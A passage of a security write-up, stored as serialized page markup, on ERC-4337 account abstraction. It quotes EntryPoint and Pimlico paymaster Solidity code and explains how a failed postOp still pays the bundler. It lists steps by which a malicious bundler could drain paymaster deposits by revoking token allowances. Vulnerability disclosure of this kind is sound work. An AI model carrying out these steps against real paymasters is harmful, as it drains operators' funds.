try",{"type":25,"tag":216,"props":110515,"children":110516},{"style":7047},[110517],{"type":31,"value":110518}," IPaymaster",{"type":25,"tag":216,"props":110520,"children":110521},{"style":6964},[110522],{"type":31,"value":110523},"(paymaster).postOp{\n",{"type":25,"tag":216,"props":110525,"children":110526},{"class":6922,"line":7636},[110527,110532,110536],{"type":25,"tag":216,"props":110528,"children":110529},{"style":6964},[110530],{"type":31,"value":110531},"                                gas",{"type":25,"tag":216,"props":110533,"children":110534},{"style":6953},[110535],{"type":31,"value":1472},{"type":25,"tag":216,"props":110537,"children":110538},{"style":6964},[110539],{"type":31,"value":110540}," mUserOp.paymasterPostOpGasLimit\n",{"type":25,"tag":216,"props":110542,"children":110543},{"class":6922,"line":7645},[110544],{"type":25,"tag":216,"props":110545,"children":110546},{"style":6964},[110547],{"type":31,"value":110548},"                            }(mode, context, actualGasCost, gasPrice)\n",{"type":25,"tag":216,"props":110550,"children":110551},{"class":6922,"line":7654},[110552,110557,110562],{"type":25,"tag":216,"props":110553,"children":110554},{"style":6927},[110555],{"type":31,"value":110556},"                        // ",{"type":25,"tag":216,"props":110558,"children":110559},{"style":6936},[110560],{"type":31,"value":110561},"solhint-disable",{"type":25,"tag":216,"props":110563,"children":110564},{"style":6927},[110565],{"type":31,"value":110566},"-next-line no-empty-blocks\n",{"type":25,"tag":216,"props":110568,"children":110569},{"class":6922,"line":7722},[110570,110575,110579],{"type":25,"tag":216,"props":110571,"children":110572},{"style":6964},[110573],{"type":31,"value":110574},"                        {} ",{"type":25,"tag":216,"props":110576,"children":110577},{"style":6973},[110578],{"type":31,"value":52380},{"type":25,"tag":216,"props":110580,"children":110581},{"style":6964},[110582],{"type":31,"value":7241},{"type":25,"tag":216,"props":110584,"children":110585},{"class":6922,"line":7730},[110586,110591,110595,110600,110604,110608,110612],{"type":25,"tag":216,"props":110587,"children":110588},{"style":7375},[110589],{"type":31,"value":110590},"                            bytes",{"type":25,"tag":216,"props":110592,"children":110593},{"style":6936},[110594],{"type":31,"value":107038},{"type":25,"tag":216,"props":110596,"children":110597},{"style":6964},[110598],{"type":31,"value":110599}," reason ",{"type":25,"tag":216,"props":110601,"children":110602},{"style":6953},[110603],{"type":31,"value":266},{"type":25,"tag":216,"props":110605,"children":110606},{"style":6964},[110607],{"type":31,"value":109809},{"type":25,"tag":216,"props":110609,"children":110610},{"style":7047},[110611],{"type":31,"value":109900},{"type":25,"tag":216,"props":110613,"children":110614},{"style":6964},[110615],{"type":31,"value":109905},{"type":25,"tag":216,"props":110617,"children":110618},{"class":6922,"line":7760},[110619,110624,110629],{"type":25,"tag":216,"props":110620,"children":110621},{"style":6973},[110622],{"type":31,"value":110623},"                            revert",{"type":25,"tag":216,"props":110625,"children":110626},{"style":7047},[110627],{"type":31,"value":110628}," PostOpReverted",{"type":25,"tag":216,"props":110630,"children":110631},{"style":6964},[110632],{"type":31,"value":110633},"(reason);\n",{"type":25,"tag":216,"props":110635,"children":110636},{"class":6922,"line":7768},[110637],{"type":25,"tag":216,"props":110638,"children":110639},{"style":6964},[110640],{"type":31,"value":74948},{"type":25,"tag":216,"props":110642,"children":110643},{"class":6922,"line":7800},[110644],{"type":25,"tag":216,"props":110645,"children":110646},{"style":6964},[110647],{"type":31,"value":75033},{"type":25,"tag":216,"props":110649,"children":110650},{"class":6922,"line":7808},[110651],{"type":25,"tag":216,"props":110652,"children":110653},{"style":6927},[110654],{"type":31,"value":110655},"                    // Calculating a penalty for unused postOp gas\n",{"type":25,"tag":216,"props":110657,"children":110658},{"class":6922,"line":7868},[110659,110663,110667],{"type":25,"tag":216,"props":110660,"children":110661},{"style":6927},[110662],{"type":31,"value":107500},{"type":25,"tag":216,"props":110664,"children":110665},{"style":6936},[110666],{"type":31,"value":70728},{"type":25,"tag":216,"props":110668,"children":110669},{"style":6927},[110670],{"type":31,"value":110671}," that if postOp is reverted, the maximum penalty (10% of postOpGasLimit) is charged.\n",{"type":25,"tag":216,"props":110673,"children":110674},{"class":6922,"line":13001},[110675,110679,110684,110688,110692,110696,110700],{"type":25,"tag":216,"props":110676,"children":110677},{"style":7375},[110678],{"type":31,"value":107435},{"type":25,"tag":216,"props":110680,"children":110681},{"style":6964},[110682],{"type":31,"value":110683}," postOpGasUsed ",{"type":25,"tag":216,"props":110685,"children":110686},{"style":6953},[110687],{"type":31,"value":266},{"type":25,"tag":216,"props":110689,"children":110690},{"style":6964},[110691],{"type":31,"value":110471},{"type":25,"tag":216,"props":110693,"children":110694},{"style":6953},[110695],{"type":31,"value":8276},{"type":25,"tag":216,"props":110697,"children":110698},{"style":6936},[110699],{"type":31,"value":109268},{"type":25,"tag":216,"props":110701,"children":110702},{"style":6964},[110703],{"type":31,"value":7633},{"type":25,"tag":216,"props":110705,"children":110706},{"class":6922,"line":13019},[110707,110712,110716,110721],{"type":25,"tag":216,"props":110708,"children":110709},{"style":6964},[110710],{"type":31,"value":110711},"                    postOpUnusedGasPenalty ",{"type":25,"tag":216,"props":110713,"children":110714},{"style":6953},[110715],{"type":31,"value":266},{"type":25,"tag":216,"props":110717,"children":110718},{"style":7047},[110719],{"type":31,"value":110720}," _getUnusedGasPenalty",{"type":25,"tag":216,"props":110722,"children":110723},{"style":6964},[110724],{"type":31,"value":110725},"(postOpGasUsed, mUserOp.paymasterPostOpGasLimit);\n",{"type":25,"tag":216,"props":110727,"children":110728},{"class":6922,"line":13064},[110729],{"type":25,"tag":216,"props":110730,"children":110731},{"style":6964},[110732],{"type":31,"value":75041},{"type":25,"tag":216,"props":110734,"children":110735},{"class":6922,"line":13170},[110736],{"type":25,"tag":216,"props":110737,"children":110738},{"style":6964},[110739],{"type":31,"value":62852},{"type":25,"tag":216,"props":110741,"children":110742},{"class":6922,"line":27455},[110743],{"type":25,"tag":216,"props":110744,"children":110745},{"style":6964},[110746],{"type":31,"value":108759},{"type":25,"tag":216,"props":110748,"children":110749},{"class":6922,"line":27490},[110750],{"type":25,"tag":216,"props":110751,"children":110752},{"style":6964},[110753],{"type":31,"value":7311},{"type":25,"tag":38,"props":110755,"children":110756},{},[110757,110759,110764,110766,110772,110774,110780,110782,110787,110789,110794,110796,110801,110803,110808,110810,110815,110817,110822],{"type":31,"value":110758},"It turns out that if the ",{"type":25,"tag":82,"props":110760,"children":110762},{"className":110761},[],[110763],{"type":31,"value":106339},{"type":31,"value":110765}," call fails, it will revert with ",{"type":25,"tag":82,"props":110767,"children":110769},{"className":110768},[],[110770],{"type":31,"value":110771},"PostOpReverted",{"type":31,"value":110773},". However, as we can see in the previous code of ",{"type":25,"tag":82,"props":110775,"children":110777},{"className":110776},[],[110778],{"type":31,"value":110779},"_executeUserOp",{"type":31,"value":110781},", even though ",{"type":25,"tag":82,"props":110783,"children":110785},{"className":110784},[],[110786],{"type":31,"value":109481},{"type":31,"value":110788}," fails, the execution won't revert. Instead, it will continue to make another ",{"type":25,"tag":82,"props":110790,"children":110792},{"className":110791},[],[110793],{"type":31,"value":110149},{"type":31,"value":110795}," call with ",{"type":25,"tag":82,"props":110797,"children":110799},{"className":110798},[],[110800],{"type":31,"value":110157},{"type":31,"value":110802}," mode, and it won't try to call ",{"type":25,"tag":82,"props":110804,"children":110806},{"className":110805},[],[110807],{"type":31,"value":106339},{"type":31,"value":110809}," again. This means the ",{"type":25,"tag":82,"props":110811,"children":110813},{"className":110812},[],[110814],{"type":31,"value":106200},{"type":31,"value":110816}," still gets paid for submitting the failed ",{"type":25,"tag":82,"props":110818,"children":110820},{"className":110819},[],[110821],{"type":31,"value":106140},{"type":31,"value":179},{"type":25,"tag":38,"props":110824,"children":110825},{},[110826,110828,110833,110835,110840,110842,110849],{"type":31,"value":110827},"Now that we understand this behavior where ",{"type":25,"tag":82,"props":110829,"children":110831},{"className":110830},[],[110832],{"type":31,"value":106339},{"type":31,"value":110834}," is allowed to fail while the ",{"type":25,"tag":82,"props":110836,"children":110838},{"className":110837},[],[110839],{"type":31,"value":106200},{"type":31,"value":110841}," still gets paid, let's examine a real-world example from the most widely used paymaster currently, which is the paymaster implemented by ",{"type":25,"tag":162,"props":110843,"children":110846},{"href":110844,"rel":110845},"https://github.com/pimlicolabs/singleton-paymaster/blob/feat/v8/src/SingletonPaymasterV7.sol",[166],[110847],{"type":31,"value":110848},"Pimlico",{"type":31,"value":179},{"type":25,"tag":206,"props":110851,"children":110853},{"className":8423,"code":110852,"language":8422,"meta":7,"style":7},"    function _postOp(\n        PostOpMode, /* mode */\n        bytes calldata _context,\n        uint256 _actualGasCost,\n        uint256 _actualUserOpFeePerGas\n    )\n        internal\n    {\n        ERC20PostOpContext memory ctx = _parsePostOpContext(_context);\n\n        uint256 expectedPenaltyGasCost = _expectedPenaltyGasCost(\n            _actualGasCost, _actualUserOpFeePerGas, ctx.postOpGas, ctx.preOpGasApproximation, ctx.executionGasLimit\n        );\n\n        uint256 actualGasCost = _actualGasCost + expectedPenaltyGasCost;\n\n        uint256 costInToken =\n            getCostInToken(actualGasCost, ctx.postOpGas, _actualUserOpFeePerGas, ctx.exchangeRate) + ctx.constantFee;\n\n        uint256 absoluteCostInToken =\n            costInToken > ctx.preFundCharged ? costInToken - ctx.preFundCharged : ctx.preFundCharged - costInToken;\n\n        SafeTransferLib.safeTransferFrom(\n            ctx.token,\n            costInToken > ctx.preFundCharged ? ctx.sender : ctx.treasury,\n            costInToken > ctx.preFundCharged ? ctx.treasury : ctx.sender,\n            absoluteCostInToken\n        );\n\n        uint256 preFundInToken = (ctx.preFund * ctx.exchangeRate) / 1e18;\n\n        if (ctx.recipient != address(0) && preFundInToken > costInToken) {\n            SafeTransferLib.safeTransferFrom(ctx.token, ctx.sender, ctx.recipient, preFundInToken - costInToken);\n        }\n\n        emit UserOperationSponsored(ctx.userOpHash, ctx.sender, ERC20_MODE, ctx.token, costInToken, ctx.exchangeRate);\n    }\n",[110854],{"type":25,"tag":82,"props":110855,"children":110856},{"__ignoreMap":7},[110857,110872,110889,110909,110925,110937,110944,110951,110958,110989,110996,111021,111029,111036,111043,111072,111079,111095,111117,111124,111140,111190,111197,111213,111221,111254,111287,111295,111302,111309,111352,111359,111408,111434,111441,111448,111465],{"type":25,"tag":216,"props":110858,"children":110859},{"class":6922,"line":6923},[110860,110864,110868],{"type":25,"tag":216,"props":110861,"children":110862},{"style":6936},[110863],{"type":31,"value":93802},{"type":25,"tag":216,"props":110865,"children":110866},{"style":7047},[110867],{"type":31,"value":107741},{"type":25,"tag":216,"props":110869,"children":110870},{"style":6964},[110871],{"type":31,"value":7420},{"type":25,"tag":216,"props":110873,"children":110874},{"class":6922,"line":6769},[110875,110880,110884],{"type":25,"tag":216,"props":110876,"children":110877},{"style":6936},[110878],{"type":31,"value":110879},"        PostOpMode",{"type":25,"tag":216,"props":110881,"children":110882},{"style":6964},[110883],{"type":31,"value":7026},{"type":25,"tag":216,"props":110885,"children":110886},{"style":6927},[110887],{"type":31,"value":110888},"/* mode */\n",{"type":25,"tag":216,"props":110890,"children":110891},{"class":6922,"line":6778},[110892,110896,110900,110905],{"type":25,"tag":216,"props":110893,"children":110894},{"style":7375},[110895],{"type":31,"value":109657},{"type":25,"tag":216,"props":110897,"children":110898},{"style":6936},[110899],{"type":31,"value":106970},{"type":25,"tag":216,"props":110901,"children":110902},{"style":6947},[110903],{"type":31,"value":110904}," _context",{"type":25,"tag":216,"props":110906,"children":110907},{"style":6964},[110908],{"type":31,"value":7465},{"type":25,"tag":216,"props":110910,"children":110911},{"class":6922,"line":7005},[110912,110916,110921],{"type":25,"tag":216,"props":110913,"children":110914},{"style":7375},[110915],{"type":31,"value":93980},{"type":25,"tag":216,"props":110917,"children":110918},{"style":6947},[110919],{"type":31,"value":110920}," _actualGasCost",{"type":25,"tag":216,"props":110922,"children":110923},{"style":6964},[110924],{"type":31,"value":7465},{"type":25,"tag":216,"props":110926,"children":110927},{"class":6922,"line":7110},[110928,110932],{"type":25,"tag":216,"props":110929,"children":110930},{"style":7375},[110931],{"type":31,"value":93980},{"type":25,"tag":216,"props":110933,"children":110934},{"style":6947},[110935],{"type":31,"value":110936}," _actualUserOpFeePerGas\n",{"type":25,"tag":216,"props":110938,"children":110939},{"class":6922,"line":7216},[110940],{"type":25,"tag":216,"props":110941,"children":110942},{"style":6964},[110943],{"type":31,"value":27876},{"type":25,"tag":216,"props":110945,"children":110946},{"class":6922,"line":7244},[110947],{"type":25,"tag":216,"props":110948,"children":110949},{"style":6936},[110950],{"type":31,"value":107009},{"type":25,"tag":216,"props":110952,"children":110953},{"class":6922,"line":7257},[110954],{"type":25,"tag":216,"props":110955,"children":110956},{"style":6964},[110957],{"type":31,"value":33147},{"type":25,"tag":216,"props":110959,"children":110960},{"class":6922,"line":7275},[110961,110966,110970,110975,110979,110984],{"type":25,"tag":216,"props":110962,"children":110963},{"style":6964},[110964],{"type":31,"value":110965},"        ERC20PostOpContext ",{"type":25,"tag":216,"props":110967,"children":110968},{"style":6936},[110969],{"type":31,"value":79944},{"type":25,"tag":216,"props":110971,"children":110972},{"style":6964},[110973],{"type":31,"value":110974}," ctx ",{"type":25,"tag":216,"props":110976,"children":110977},{"style":6953},[110978],{"type":31,"value":266},{"type":25,"tag":216,"props":110980,"children":110981},{"style":7047},[110982],{"type":31,"value":110983}," _parsePostOpContext",{"type":25,"tag":216,"props":110985,"children":110986},{"style":6964},[110987],{"type":31,"value":110988},"(_context);\n",{"type":25,"tag":216,"props":110990,"children":110991},{"class":6922,"line":7296},[110992],{"type":25,"tag":216,"props":110993,"children":110994},{"emptyLinePlaceholder":16},[110995],{"type":31,"value":7642},{"type":25,"tag":216,"props":110997,"children":110998},{"class":6922,"line":7305},[110999,111003,111008,111012,111017],{"type":25,"tag":216,"props":111000,"children":111001},{"style":7375},[111002],{"type":31,"value":93980},{"type":25,"tag":216,"props":111004,"children":111005},{"style":6964},[111006],{"type":31,"value":111007}," expectedPenaltyGasCost ",{"type":25,"tag":216,"props":111009,"children":111010},{"style":6953},[111011],{"type":31,"value":266},{"type":25,"tag":216,"props":111013,"children":111014},{"style":7047},[111015],{"type":31,"value":111016}," _expectedPenaltyGasCost",{"type":25,"tag":216,"props":111018,"children":111019},{"style":6964},[111020],{"type":31,"value":7420},{"type":25,"tag":216,"props":111022,"children":111023},{"class":6922,"line":7557},[111024],{"type":25,"tag":216,"props":111025,"children":111026},{"style":6964},[111027],{"type":31,"value":111028},"            _actualGasCost, _actualUserOpFeePerGas, ctx.postOpGas, ctx.preOpGasApproximation, ctx.executionGasLimit\n",{"type":25,"tag":216,"props":111030,"children":111031},{"class":6922,"line":7574},[111032],{"type":25,"tag":216,"props":111033,"children":111034},{"style":6964},[111035],{"type":31,"value":11695},{"type":25,"tag":216,"props":111037,"children":111038},{"class":6922,"line":7591},[111039],{"type":25,"tag":216,"props":111040,"children":111041},{"emptyLinePlaceholder":16},[111042],{"type":31,"value":7642},{"type":25,"tag":216,"props":111044,"children":111045},{"class":6922,"line":7604},[111046,111050,111054,111058,111063,111067],{"type":25,"tag":216,"props":111047,"children":111048},{"style":7375},[111049],{"type":31,"value":93980},{"type":25,"tag":216,"props":111051,"children":111052},{"style":6964},[111053],{"type":31,"value":108065},{"type":25,"tag":216,"props":111055,"children":111056},{"style":6953},[111057],{"type":31,"value":266},{"type":25,"tag":216,"props":111059,"children":111060},{"style":6964},[111061],{"type":31,"value":111062}," _actualGasCost ",{"type":25,"tag":216,"props":111064,"children":111065},{"style":6953},[111066],{"type":31,"value":3539},{"type":25,"tag":216,"props":111068,"children":111069},{"style":6964},[111070],{"type":31,"value":111071}," expectedPenaltyGasCost;\n",{"type":25,"tag":216,"props":111073,"children":111074},{"class":6922,"line":7613},[111075],{"type":25,"tag":216,"props":111076,"children":111077},{"emptyLinePlaceholder":16},[111078],{"type":31,"value":7642},{"type":25,"tag":216,"props":111080,"children":111081},{"class":6922,"line":7636},[111082,111086,111091],{"type":25,"tag":216,"props":111083,"children":111084},{"style":7375},[111085],{"type":31,"value":93980},{"type":25,"tag":216,"props":111087,"children":111088},{"style":6964},[111089],{"type":31,"value":111090}," costInToken ",{"type":25,"tag":216,"props":111092,"children":111093},{"style":6953},[111094],{"type":31,"value":18650},{"type":25,"tag":216,"props":111096,"children":111097},{"class":6922,"line":7645},[111098,111103,111108,111112],{"type":25,"tag":216,"props":111099,"children":111100},{"style":7047},[111101],{"type":31,"value":111102},"            getCostInToken",{"type":25,"tag":216,"props":111104,"children":111105},{"style":6964},[111106],{"type":31,"value":111107},"(actualGasCost, ctx.postOpGas, _actualUserOpFeePerGas, ctx.exchangeRate) ",{"type":25,"tag":216,"props":111109,"children":111110},{"style":6953},[111111],{"type":31,"value":3539},{"type":25,"tag":216,"props":111113,"children":111114},{"style":6964},[111115],{"type":31,"value":111116}," ctx.constantFee;\n",{"type":25,"tag":216,"props":111118,"children":111119},{"class":6922,"line":7654},[111120],{"type":25,"tag":216,"props":111121,"children":111122},{"emptyLinePlaceholder":16},[111123],{"type":31,"value":7642},{"type":25,"tag":216,"props":111125,"children":111126},{"class":6922,"line":7722},[111127,111131,111136],{"type":25,"tag":216,"props":111128,"children":111129},{"style":7375},[111130],{"type":31,"value":93980},{"type":25,"tag":216,"props":111132,"children":111133},{"style":6964},[111134],{"type":31,"value":111135}," absoluteCostInToken ",{"type":25,"tag":216,"props":111137,"children":111138},{"style":6953},[111139],{"type":31,"value":18650},{"type":25,"tag":216,"props":111141,"children":111142},{"class":6922,"line":7730},[111143,111148,111152,111157,111161,111165,111169,111173,111177,111181,111185],{"type":25,"tag":216,"props":111144,"children":111145},{"style":6964},[111146],{"type":31,"value":111147},"            costInToken ",{"type":25,"tag":216,"props":111149,"children":111150},{"style":6953},[111151],{"type":31,"value":5902},{"type":25,"tag":216,"props":111153,"children":111154},{"style":6964},[111155],{"type":31,"value":111156}," ctx.preFundCharged ",{"type":25,"tag":216,"props":111158,"children":111159},{"style":6953},[111160],{"type":31,"value":604},{"type":25,"tag":216,"props":111162,"children":111163},{"style":6964},[111164],{"type":31,"value":111090},{"type":25,"tag":216,"props":111166,"children":111167},{"style":6953},[111168],{"type":31,"value":8276},{"type":25,"tag":216,"props":111170,"children":111171},{"style":6964},[111172],{"type":31,"value":111156},{"type":25,"tag":216,"props":111174,"children":111175},{"style":6953},[111176],{"type":31,"value":1472},{"type":25,"tag":216,"props":111178,"children":111179},{"style":6964},[111180],{"type":31,"value":111156},{"type":25,"tag":216,"props":111182,"children":111183},{"style":6953},[111184],{"type":31,"value":8276},{"type":25,"tag":216,"props":111186,"children":111187},{"style":6964},[111188],{"type":31,"value":111189}," costInToken;\n",{"type":25,"tag":216,"props":111191,"children":111192},{"class":6922,"line":7760},[111193],{"type":25,"tag":216,"props":111194,"children":111195},{"emptyLinePlaceholder":16},[111196],{"type":31,"value":7642},{"type":25,"tag":216,"props":111198,"children":111199},{"class":6922,"line":7768},[111200,111205,111209],{"type":25,"tag":216,"props":111201,"children":111202},{"style":6964},[111203],{"type":31,"value":111204},"        SafeTransferLib.",{"type":25,"tag":216,"props":111206,"children":111207},{"style":7047},[111208],{"type":31,"value":107596},{"type":25,"tag":216,"props":111210,"children":111211},{"style":6964},[111212],{"type":31,"value":7420},{"type":25,"tag":216,"props":111214,"children":111215},{"class":6922,"line":7800},[111216],{"type":25,"tag":216,"props":111217,"children":111218},{"style":6964},[111219],{"type":31,"value":111220},"            ctx.token,\n",{"type":25,"tag":216,"props":111222,"children":111223},{"class":6922,"line":7808},[111224,111228,111232,111236,111240,111245,111249],{"type":25,"tag":216,"props":111225,"children":111226},{"style":6964},[111227],{"type":31,"value":111147},{"type":25,"tag":216,"props":111229,"children":111230},{"style":6953},[111231],{"type":31,"value":5902},{"type":25,"tag":216,"props":111233,"children":111234},{"style":6964},[111235],{"type":31,"value":111156},{"type":25,"tag":216,"props":111237,"children":111238},{"style":6953},[111239],{"type":31,"value":604},{"type":25,"tag":216,"props":111241,"children":111242},{"style":6964},[111243],{"type":31,"value":111244}," ctx.sender ",{"type":25,"tag":216,"props":111246,"children":111247},{"style":6953},[111248],{"type":31,"value":1472},{"type":25,"tag":216,"props":111250,"children":111251},{"style":6964},[111252],{"type":31,"value":111253}," ctx.treasury,\n",{"type":25,"tag":216,"props":111255,"children":111256},{"class":6922,"line":7868},[111257,111261,111265,111269,111273,111278,111282],{"type":25,"tag":216,"props":111258,"children":111259},{"style":6964},[111260],{"type":31,"value":111147},{"type":25,"tag":216,"props":111262,"children":111263},{"style":6953},[111264],{"type":31,"value":5902},{"type":25,"tag":216,"props":111266,"children":111267},{"style":6964},[111268],{"type":31,"value":111156},{"type":25,"tag":216,"props":111270,"children":111271},{"style":6953},[111272],{"type":31,"value":604},{"type":25,"tag":216,"props":111274,"children":111275},{"style":6964},[111276],{"type":31,"value":111277}," ctx.treasury ",{"type":25,"tag":216,"props":111279,"children":111280},{"style":6953},[111281],{"type":31,"value":1472},{"type":25,"tag":216,"props":111283,"children":111284},{"style":6964},[111285],{"type":31,"value":111286}," ctx.sender,\n",{"type":25,"tag":216,"props":111288,"children":111289},{"class":6922,"line":13001},[111290],{"type":25,"tag":216,"props":111291,"children":111292},{"style":6964},[111293],{"type":31,"value":111294},"            absoluteCostInToken\n",{"type":25,"tag":216,"props":111296,"children":111297},{"class":6922,"line":13019},[111298],{"type":25,"tag":216,"props":111299,"children":111300},{"style":6964},[111301],{"type":31,"value":11695},{"type":25,"tag":216,"props":111303,"children":111304},{"class":6922,"line":13064},[111305],{"type":25,"tag":216,"props":111306,"children":111307},{"emptyLinePlaceholder":16},[111308],{"type":31,"value":7642},{"type":25,"tag":216,"props":111310,"children":111311},{"class":6922,"line":13170},[111312,111316,111321,111325,111330,111334,111339,111343,111348],{"type":25,"tag":216,"props":111313,"children":111314},{"style":7375},[111315],{"type":31,"value":93980},{"type":25,"tag":216,"props":111317,"children":111318},{"style":6964},[111319],{"type":31,"value":111320}," preFundInToken ",{"type":25,"tag":216,"props":111322,"children":111323},{"style":6953},[111324],{"type":31,"value":266},{"type":25,"tag":216,"props":111326,"children":111327},{"style":6964},[111328],{"type":31,"value":111329}," (ctx.preFund ",{"type":25,"tag":216,"props":111331,"children":111332},{"style":6953},[111333],{"type":31,"value":8519},{"type":25,"tag":216,"props":111335,"children":111336},{"style":6964},[111337],{"type":31,"value":111338}," ctx.exchangeRate) ",{"type":25,"tag":216,"props":111340,"children":111341},{"style":6953},[111342],{"type":31,"value":5755},{"type":25,"tag":216,"props":111344,"children":111345},{"style":6989},[111346],{"type":31,"value":111347}," 1e18",{"type":25,"tag":216,"props":111349,"children":111350},{"style":6964},[111351],{"type":31,"value":6967},{"type":25,"tag":216,"props":111353,"children":111354},{"class":6922,"line":27455},[111355],{"type":25,"tag":216,"props":111356,"children":111357},{"emptyLinePlaceholder":16},[111358],{"type":31,"value":7642},{"type":25,"tag":216,"props":111360,"children":111361},{"class":6922,"line":27490},[111362,111366,111371,111375,111379,111383,111387,111391,111395,111399,111403],{"type":25,"tag":216,"props":111363,"children":111364},{"style":6973},[111365],{"type":31,"value":7222},{"type":25,"tag":216,"props":111367,"children":111368},{"style":6964},[111369],{"type":31,"value":111370}," (ctx.recipient ",{"type":25,"tag":216,"props":111372,"children":111373},{"style":6953},[111374],{"type":31,"value":19646},{"type":25,"tag":216,"props":111376,"children":111377},{"style":7375},[111378],{"type":31,"value":10201},{"type":25,"tag":216,"props":111380,"children":111381},{"style":6964},[111382],{"type":31,"value":1850},{"type":25,"tag":216,"props":111384,"children":111385},{"style":6989},[111386],{"type":31,"value":1882},{"type":25,"tag":216,"props":111388,"children":111389},{"style":6964},[111390],{"type":31,"value":7036},{"type":25,"tag":216,"props":111392,"children":111393},{"style":6953},[111394],{"type":31,"value":77167},{"type":25,"tag":216,"props":111396,"children":111397},{"style":6964},[111398],{"type":31,"value":111320},{"type":25,"tag":216,"props":111400,"children":111401},{"style":6953},[111402],{"type":31,"value":5902},{"type":25,"tag":216,"props":111404,"children":111405},{"style":6964},[111406],{"type":31,"value":111407}," costInToken) {\n",{"type":25,"tag":216,"props":111409,"children":111410},{"class":6922,"line":27498},[111411,111416,111420,111425,111429],{"type":25,"tag":216,"props":111412,"children":111413},{"style":6964},[111414],{"type":31,"value":111415},"            SafeTransferLib.",{"type":25,"tag":216,"props":111417,"children":111418},{"style":7047},[111419],{"type":31,"value":107596},{"type":25,"tag":216,"props":111421,"children":111422},{"style":6964},[111423],{"type":31,"value":111424},"(ctx.token, ctx.sender, ctx.recipient, preFundInToken ",{"type":25,"tag":216,"props":111426,"children":111427},{"style":6953},[111428],{"type":31,"value":8276},{"type":25,"tag":216,"props":111430,"children":111431},{"style":6964},[111432],{"type":31,"value":111433}," costInToken);\n",{"type":25,"tag":216,"props":111435,"children":111436},{"class":6922,"line":27506},[111437],{"type":25,"tag":216,"props":111438,"children":111439},{"style":6964},[111440],{"type":31,"value":7302},{"type":25,"tag":216,"props":111442,"children":111443},{"class":6922,"line":27515},[111444],{"type":25,"tag":216,"props":111445,"children":111446},{"emptyLinePlaceholder":16},[111447],{"type":31,"value":7642},{"type":25,"tag":216,"props":111449,"children":111450},{"class":6922,"line":27557},[111451,111456,111460],{"type":25,"tag":216,"props":111452,"children":111453},{"style":6973},[111454],{"type":31,"value":111455},"        emit",{"type":25,"tag":216,"props":111457,"children":111458},{"style":7047},[111459],{"type":31,"value":108330},{"type":25,"tag":216,"props":111461,"children":111462},{"style":6964},[111463],{"type":31,"value":111464},"(ctx.userOpHash, ctx.sender, ERC20_MODE, ctx.token, costInToken, ctx.exchangeRate);\n",{"type":25,"tag":216,"props":111466,"children":111467},{"class":6922,"line":27590},[111468],{"type":25,"tag":216,"props":111469,"children":111470},{"style":6964},[111471],{"type":31,"value":7311},{"type":25,"tag":38,"props":111473,"children":111474},{},[111475,111477,111482,111484,111490,111492,111498,111500,111505,111507,111512],{"type":31,"value":111476},"As shown above, the paymaster calculates the actual gas used and attempts to charge the user by calling ",{"type":25,"tag":82,"props":111478,"children":111480},{"className":111479},[],[111481],{"type":31,"value":107596},{"type":31,"value":111483},". Note that ",{"type":25,"tag":82,"props":111485,"children":111487},{"className":111486},[],[111488],{"type":31,"value":111489},"preFundCharged",{"type":31,"value":111491}," can be zero, as users can opt out of any ",{"type":25,"tag":82,"props":111493,"children":111495},{"className":111494},[],[111496],{"type":31,"value":111497},"preFund",{"type":31,"value":111499}," during the validation phase. If the user hasn't given sufficient allowance to Pimlico's paymaster for the transfer, the ",{"type":25,"tag":82,"props":111501,"children":111503},{"className":111502},[],[111504],{"type":31,"value":108397},{"type":31,"value":111506}," call inside ",{"type":25,"tag":82,"props":111508,"children":111510},{"className":111509},[],[111511],{"type":31,"value":109481},{"type":31,"value":111513}," will revert and the paymaster won't be able to collect payment from the user.",{"type":25,"tag":38,"props":111515,"children":111516},{},[111517,111519,111524,111526,111532,111534,111540],{"type":31,"value":111518},"However, even when ",{"type":25,"tag":82,"props":111520,"children":111522},{"className":111521},[],[111523],{"type":31,"value":108397},{"type":31,"value":111525}," fails, the EntryPoint will still complete the execution and pay the bundler who submitted it. Importantly, this payment comes from the paymaster's deposit, since during validation the ",{"type":25,"tag":82,"props":111527,"children":111529},{"className":111528},[],[111530],{"type":31,"value":111531},"requiredPrefund",{"type":31,"value":111533}," was taken from the paymaster's ",{"type":25,"tag":162,"props":111535,"children":111538},{"href":111536,"rel":111537},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L625-L627",[166],[111539],{"type":31,"value":65931},{"type":31,"value":179},{"type":25,"tag":38,"props":111542,"children":111543},{},[111544,111546,111551],{"type":31,"value":111545},"This creates a critical vulnerability for paymasters that implement post-execution charging patterns. Even if the ",{"type":25,"tag":82,"props":111547,"children":111549},{"className":111548},[],[111550],{"type":31,"value":108397},{"type":31,"value":111552}," call fails (meaning the paymaster couldn't collect payment from the user), the paymaster still has to pay the bundler's gas costs from their deposited funds. This vulnerability can be exploited by malicious bundlers in the following way:",{"type":25,"tag":6711,"props":111554,"children":111555},{},[111556,111574,111593,111604,111609],{"type":25,"tag":2043,"props":111557,"children":111558},{},[111559,111561,111566,111568],{"type":31,"value":111560},"The bundler creates a ",{"type":25,"tag":82,"props":111562,"children":111564},{"className":111563},[],[111565],{"type":31,"value":106140},{"type":31,"value":111567}," with an intentionally high ",{"type":25,"tag":82,"props":111569,"children":111571},{"className":111570},[],[111572],{"type":31,"value":111573},"gasPrice",{"type":25,"tag":2043,"props":111575,"children":111576},{},[111577,111579,111584,111586,111591],{"type":31,"value":111578},"The bundler ensures the ",{"type":25,"tag":82,"props":111580,"children":111582},{"className":111581},[],[111583],{"type":31,"value":108397},{"type":31,"value":111585}," call will fail by revoking the paymaster's token allowance before ",{"type":25,"tag":82,"props":111587,"children":111589},{"className":111588},[],[111590],{"type":31,"value":108397},{"type":31,"value":111592}," executes",{"type":25,"tag":2043,"props":111594,"children":111595},{},[111596,111597,111602],{"type":31,"value":67323},{"type":25,"tag":82,"props":111598,"children":111600},{"className":111599},[],[111601],{"type":31,"value":108397},{"type":31,"value":111603}," fails, the bundler still gets paid their high gas costs by the paymaster",{"type":25,"tag":2043,"props":111605,"children":111606},{},[111607],{"type":31,"value":111608},"The paymaster loses money since they paid the bundler but couldn't collect from the user",{"type":25,"tag":2043,"props":111610,"children":111611},{},[111612],{"type":31,"value":111613},"The bundler profits as long as their actual gas costs are less than what they charged",{"type":25,"tag":38,"props":111615,"children":111616},{},[111617,111619,111624,111626,111631],{"type":31,"value":111618},"This effectively allows bundlers to drain paymaster deposits by submitting ",{"type":25,"tag":82,"props":111620,"children":111622},{"className":111621},[],[111623],{"type":31,"value":106169},{"type":31,"value":111625}," designed to fail during 